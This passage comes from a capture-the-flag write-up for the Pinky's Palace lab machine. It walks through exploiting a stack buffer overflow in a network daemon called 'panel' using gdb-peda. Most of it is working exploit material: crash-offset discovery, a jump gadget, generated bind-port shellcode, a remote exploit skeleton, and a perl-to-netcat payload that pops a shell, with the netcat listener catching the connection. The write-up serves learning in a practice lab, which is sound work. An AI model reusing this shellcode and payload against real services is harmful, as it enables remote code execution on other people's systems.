    46: 0000000000400c00     2 FUNC    GLOBAL DEFAULT   13 __libc_csu_fini
    47: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    49: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    50: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIB[...]
    52: 0000000000400c04     0 FUNC    GLOBAL DEFAULT   14 _fini
    53: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    54: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    55: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    56: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    57: 0000000000400964    71 FUNC    GLOBAL DEFAULT   13 handlecmd
    58: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    59: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    60: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_mai[...]
    65: 0000000000400b90   101 FUNC    GLOBAL DEFAULT   13 __libc_csu_init
    66: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    68: 0000000000400840    43 FUNC    GLOBAL DEFAULT   13 _start
    70: 00000000004009ab   473 FUNC    GLOBAL DEFAULT   13 main
    71: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    72: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    73: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    75: 0000000000400936    46 FUNC    GLOBAL DEFAULT   13 fatal
    76: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    77: 0000000000400718     0 FUNC    GLOBAL DEFAULT   11 _init
    78: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
    79: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]@GLIBC_2.2.5
# If I was a betting man, I'd say handlecmd is what we're going to care about... Let's disassemble
$ gdb ./panel
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./panel...
(No debugging symbols found in ./panel)
(gdb) disassemble handlecmd
Dump of assembler code for function handlecmd:
   0x0000000000400964 <+0>:	push   %rbp
   0x0000000000400965 <+1>:	mov    %rsp,%rbp
   0x0000000000400968 <+4>:	add    $0xffffffffffffff80,%rsp
   0x000000000040096c <+8>:	mov    %rdi,-0x78(%rbp)
   0x0000000000400970 <+12>:	mov    %esi,-0x7c(%rbp)
   0x0000000000400973 <+15>:	mov    -0x78(%rbp),%rdx
   0x0000000000400977 <+19>:	lea    -0x70(%rbp),%rax
   0x000000000040097b <+23>:	mov    %rdx,%rsi
   0x000000000040097e <+26>:	mov    %rax,%rdi
   0x0000000000400981 <+29>:	call   0x400750 <[email protected]>
   0x0000000000400986 <+34>:	lea    -0x70(%rbp),%rax
   0x000000000040098a <+38>:	mov    %rax,%rdi
   0x000000000040098d <+41>:	call   0x400770 <[email protected]>
   0x0000000000400992 <+46>:	mov    %rax,%rdx
   0x0000000000400995 <+49>:	lea    -0x70(%rbp),%rsi
   0x0000000000400999 <+53>:	mov    -0x7c(%rbp),%eax
   0x000000000040099c <+56>:	mov    $0x0,%ecx
   0x00000000004009a1 <+61>:	mov    %eax,%edi
   0x00000000004009a3 <+63>:	call   0x400790 <[email protected]>
   0x00000000004009a8 <+68>:	nop
   0x00000000004009a9 <+69>:	leave  
   0x00000000004009aa <+70>:	ret

We can see strcpy and all that, this is highly likely a simple stack overflow. Again, I hate this process, there must be an easy way to go about this…

I found this: https://github.com/longld/peda

I’ll give it a shot.

$ $ gdb ./panel                                 
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./panel...
(No debugging symbols found in ./panel)
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x4009ab (<main>:	push   rbp)
RBX: 0x0 
RCX: 0x7ffff7fad718 --> 0x7ffff7fafb00 --> 0x0 
RDX: 0x7fffffffe108 --> 0x7fffffffe432 ("SSH_AUTH_SOCK=/tmp/ssh-oeWCWJtY5ucW/agent.847")
RSI: 0x7fffffffe0f8 --> 0x7fffffffe417 ("/home/kali/Downloads/panel")
RDI: 0x1 
RBP: 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
RIP: 0x4009af (<main+4>:	sub    rsp,0x1050)
R8 : 0x0 
R9 : 0x7ffff7fe2180 (<_dl_fini>:	push   rbp)
R10: 0x8 
R11: 0x202 
R12: 0x400840 (<_start>:	xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4009aa <handlecmd+70>:	ret    
   0x4009ab <main>:	push   rbp
   0x4009ac <main+1>:	mov    rbp,rsp
=> 0x4009af <main+4>:	sub    rsp,0x1050
   0x4009b6 <main+11>:	call   0x400820 <[email protected]>
   0x4009bb <main+16>:	mov    DWORD PTR [rbp-0x4],eax
   0x4009be <main+19>:	cmp    DWORD PTR [rbp-0x4],0x0
   0x4009c2 <main+23>:	jne    0x400b75 <main+458>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe000 --> 0x400b90 (<__libc_csu_init>:	push   r15)
0008| 0x7fffffffe008 --> 0x7ffff7e15d0a (<__libc_start_main+234>:	mov    edi,eax)
0016| 0x7fffffffe010 --> 0x7fffffffe0f8 --> 0x7fffffffe417 ("/home/kali/Downloads/panel")
0024| 0x7fffffffe018 --> 0x1ffffe3f9 
0032| 0x7fffffffe020 --> 0x4009ab (<main>:	push   rbp)
0040| 0x7fffffffe028 --> 0x7ffff7e158e9 (<init_cacheinfo+569>:	mov    r8,rax)
0048| 0x7fffffffe030 --> 0x0 
0056| 0x7fffffffe038 --> 0x29ce7ed0c7935da9 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004009af in main ()
gdb-peda$ aslr
ASLR is OFF

Damn that’s pretty sweet actually, this at least makes it less painful.

# Alright so, from the readme here I think this is the process we take
# Add breakpoint at return of command we're targeting...
gdb-peda$ b *handlecmd+70
Breakpoint 2 at 0x4009aa
gdb-peda$ run
Starting program: /home/kali/Downloads/panel 
[Attaching after process 456524 fork to child process 456525]
[New inferior 2 (process 456525)]
[Detaching after fork from parent process 456524]
[Inferior 1 (process 456524) detached]

# Create a patern file to send to the socket to try to overflow it
gdb-peda$ pattern create
Error: missing argument
Generate, search, or write a cyclic pattern to memory
Set "pattern" option for basic/extended pattern type
Usage:
    pattern create size [file]
    pattern offset value
    pattern search
    pattern patch address size
    pattern arg size1 [size2,offset2]
    pattern env size[,offset]

gdb-peda$ pattern create 256 pattern
Writing pattern of 256 chars to filename "pattern"

# In another shell, send the patern
└─$ cat pattern | nc localhost 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky\'s Palace.
=> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G

# Back in GDB find the crash offset
[Switching to process 456525]
[----------------------------------registers-----------------------------------]
RAX: 0x100 
RBX: 0x0 
RCX: 0x7ffff7eee20c (<__libc_send+28>:	cmp    rax,0xfffffffffffff000)
RDX: 0x100 
RSI: 0x7fffffffcf30 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x4 
RBP: 0x41414e4141384141 ('AA8AANAA')
RSP: 0x7fffffffcfa8 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
RIP: 0x4009aa (<handlecmd+70>:	ret)
R8 : 0x0 
R9 : 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x400840 (<_start>:	xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4009a3 <handlecmd+63>:	call   0x400790 <[email protected]>
   0x4009a8 <handlecmd+68>:	nop
   0x4009a9 <handlecmd+69>:	leave  
=> 0x4009aa <handlecmd+70>:	ret    
   0x4009ab <main>:	push   rbp
   0x4009ac <main+1>:	mov    rbp,rsp
   0x4009af <main+4>:	sub    rsp,0x1050
   0x4009b6 <main+11>:	call   0x400820 <[email protected]>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffcfa8 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0008| 0x7fffffffcfb0 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0016| 0x7fffffffcfb8 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0024| 0x7fffffffcfc0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0032| 0x7fffffffcfc8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0040| 0x7fffffffcfd0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0048| 0x7fffffffcfd8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0056| 0x7fffffffcfe0 ("AuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "panel" hit Breakpoint 2, 0x00000000004009aa in handlecmd ()

$ patts 
gdb-peda$ patts
Registers contain pattern buffer:
RBP+0 found at offset: 112
Registers point to pattern buffer:
[RSI] --> offset 0 - size ~203
[RSP] --> offset 120 - size ~136
Pattern buffer found at:
0x00007fffffffcc90 : offset  241 - size   15 ($sp + -0x318 [-198 dwords])
0x00007fffffffccb0 : offset  240 - size   16 ($sp + -0x2f8 [-190 dwords])
0x00007fffffffcf30 : offset    0 - size  256 ($sp + -0x78 [-30 dwords])
0x00007fffffffd031 : offset  129 - size  127 ($sp + 0x89 [34 dwords])
References to pattern buffer found at:
0x00007fffffffcb80 : 0x00007fffffffcf30 ($sp + -0x428 [-266 dwords])
0x00007fffffffcba0 : 0x00007fffffffcf30 ($sp + -0x408 [-258 dwords])

I think register RSP has determined our offset, 120! Now the next part of the process is finding a jmp we can abuse, this neat little gdb add-on has something for that too, look!

gdb-peda$ jmpcall
0x400728 : call rax
0x400895 : jmp rax
0x4008e3 : jmp rax
0x40092e : call rax
0x400cfb : call rsp
0x400d6b : call [rax]

This is fucking awesome. We can even generate our shellcode here!!!

gdb-peda$ shellcode generate x86/linux bindport 4444 192.168.2.23
# x86/linux/bindport: 84 bytes
# port=4444, host=192.168.2.23
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)

It even provides skeleton python code for exploiting!!!

gdb-peda$ skeleton
Error: missing argument
Generate python exploit code template
Usage:
    skeleton type [file]
        type = argv: local exploit via argument
        type = env: local exploit via crafted environment (including NULL byte)
        type = stdin: local exploit via stdin
        type = remote: remote exploit via TCP socket

gdb-peda$ skeleton remote

#!/usr/bin/env python
#
# Template for remote TCP exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time

def usage():
    print "Usage: %s host port" % sys.argv[0]
    return

def pattern(size=1024, start=0):
    try:
        bytes = open("pattern.txt").read(size+start)
        return bytes[start:]
    except:
        return "A"*size

def nops(size=1024):
    return "\x90"*size

def int2hexstr(num, intsize=4):
    if intsize == 8:
        if num < 0:
            result = struct.pack("<q", num)
        else:
            result = struct.pack("<Q", num)
    else:
        if num < 0:
            result = struct.pack("<l", num)
        else:
            result = struct.pack("<L", num)
    return result

i2hs = int2hexstr

def list2hexstr(intlist, intsize=4):
    result = ""
    for value in intlist:
        if isinstance(value, str):
            result += value
        else:
            result += int2hexstr(value, intsize)
    return result

l2hs = list2hexstr

from socket import *
import telnetlib
class TCPClient():
    def __init__(self, host, port, debug=0):
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.connect((host, port))

    def debug_log(self, size, data, cmd):
        if self.debug != 0:
            print "%s(%d): %s" % (cmd, size, repr(data))

    def send(self, data, delay=0):
        if delay:
            time.sleep(delay)
        nsend = self.sock.send(data)
        if self.debug > 1:
            self.debug_log(nsend, data, "send")
        return nsend

    def sendline(self, data, delay=0):
        nsend = self.send(data + "\n", delay)
        return nsend

    def recv(self, size=1024, delay=0):
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        buf = ""
        while True:
            c = self.sock.recv(1)
            buf += c
            if delim in buf:
                break
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        buf = self.recv_until("\n")
        return buf

    def close(self):
        self.sock.close()

def exploit(host, port):
    port = int(port)
    client = TCPClient(host, port, debug=1)
    padding = pattern(0)
    payload = [padding]
    payload += ["PAYLOAD"] # put your payload here
    payload = list2hexstr(payload)
    raw_input("Enter to continue")
    client.send(payload)
    try:
        t = telnetlib.Telnet()
        t.sock = client.sock
        t.interact()
        t.close()
    except KeyboardInterrupt:
        pass

if __name__ == "__main__":
    if len(sys.argv) < 3:
        usage()
    else:
        exploit(sys.argv[1], sys.argv[2])

I’m very impressed! Although, it’s not exactly what I wanted, I’d rather do that part myself with some quick perl

# Payload is 84 bytes, so we add x90*36, our payload, then address 0x4008e3 with a new NOP's
$ perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xe3\x08\x40\x00\x00\x00"' 

Let’s try!

$ perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xe3\x08\x40\x00\x00\x00"' | nc 192.168.2.24 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky\'s Palace.
=> ������������������������������������1�SCSjjfX���̀�CRfh\fS��jfXPQV��̀�f��̀RRVC��f̀�jY�?̀Iy��
                                                                                         Rh//shh/bin��RS��̀@

Exited, no shell popped… hmm. Let’s try this return address instead?

perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xfb\x0c\x40\x00\x00\x00"' | nc 192.168.2.24 31337

$ nc -lvp 4444             
listening on [any] 4444 ...
id
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39438
uid=1001(demon) gid=1001(demon) groups=1001(demon)
id
uid=1001(demon) gid=1001(demon) groups=1001(demon)

Wow are you kidding me? OH FUCK WAIT, THAT BACKUP SCRIPT IS HITTING 4444! I edited the script, tried again, GG:

15

My god, this one was the hardest I’ve done by a good margin. Took me FOREVER, but was very fun, I learned a lot of new shit!

Directory
$ cd content && tree